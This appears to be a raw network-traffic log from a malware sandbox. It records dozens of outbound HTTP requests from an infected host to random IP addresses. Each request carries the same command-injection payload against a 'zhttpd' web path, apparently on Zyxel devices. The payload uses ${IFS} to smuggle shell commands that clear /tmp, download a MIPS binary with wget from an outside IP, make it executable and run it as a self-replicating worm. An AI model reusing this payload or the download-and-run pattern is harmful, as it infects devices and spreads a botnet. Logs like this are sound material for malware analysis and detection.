                                          Jan 14, 2024 15:46:19.060411930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5083192.168.2.2352400223.183.64.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060444117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5084192.168.2.2333556121.120.227.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060477972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5085192.168.2.2332940103.162.246.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060486078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5086192.168.2.2345940195.173.76.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060507059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5087192.168.2.235054299.65.156.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060549974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5088192.168.2.2345146174.82.151.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060595036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5089192.168.2.2352432142.62.206.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060617924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5090192.168.2.234592884.99.93.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060650110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5091192.168.2.234477240.56.109.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060714006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5092192.168.2.2335066165.223.32.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060731888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5093192.168.2.2343782104.200.252.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060775042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5094192.168.2.2332850113.23.22.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060807943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5095192.168.2.2341442120.36.21.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060866117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5096192.168.2.2334270140.226.219.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060897112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5097192.168.2.2343316155.167.60.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060961962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5098192.168.2.2338204221.252.76.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060988903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5099192.168.2.235466669.246.202.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061023951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5100192.168.2.235982273.145.233.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061054945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5101192.168.2.2341644174.147.179.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061085939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5102192.168.2.233786069.242.65.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061161041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5103192.168.2.2343620176.101.156.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061182976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5104192.168.2.233318688.88.2.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061213017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5105192.168.2.233936427.98.160.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061265945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5106192.168.2.2334706220.99.14.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061290026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5107192.168.2.2335376161.55.226.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061347961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5108192.168.2.234332674.31.35.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061376095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5109192.168.2.2352106160.117.86.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061412096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5110192.168.2.233405082.105.202.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061446905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5111192.168.2.2337542178.24.75.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061472893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5112192.168.2.2348040188.245.79.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061527014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5113192.168.2.235888086.215.18.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061548948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5114192.168.2.2356112211.12.248.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061609030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5115192.168.2.2343214185.107.246.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061642885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5116192.168.2.234666098.92.148.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061697006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5117192.168.2.2354458179.97.124.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061724901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5118192.168.2.2356886117.209.66.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061758041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5119192.168.2.2335630154.93.166.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061773062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5120192.168.2.233998668.90.10.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.061808109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5121192.168.2.2332978124.186.216.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.065706015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5122192.168.2.2339826126.52.151.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.075531006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5123192.168.2.233739449.222.62.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.075654984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5124192.168.2.2340772191.152.58.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.075714111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5125192.168.2.235610420.69.129.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.075756073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5126192.168.2.233707031.90.169.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.075788021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5127192.168.2.2351584109.185.130.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.075812101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5128192.168.2.233496839.247.56.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.075843096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5129192.168.2.235253687.90.53.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.075886011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5130192.168.2.235677479.70.13.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.075910091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5131192.168.2.2337742189.36.211.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.075942993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5132192.168.2.233865249.33.236.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.075963020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5133192.168.2.2349488174.225.188.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.075989962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5134192.168.2.2337514213.144.246.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076107025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5135192.168.2.2353866103.214.242.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076133013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5136192.168.2.2348878147.204.35.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076162100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5137192.168.2.235264640.191.134.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076200962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5138192.168.2.235065269.58.163.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076261044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5139192.168.2.2348406201.90.215.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076343060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5140192.168.2.2338092212.152.210.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076406002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5141192.168.2.2348110149.64.245.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076445103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5142192.168.2.2344248163.16.136.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076482058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5143192.168.2.233430694.89.29.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076508999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5144192.168.2.2344542182.253.235.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076539040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5145192.168.2.2351768161.8.246.95443
                                          TimestampBytes transferredDirectionData
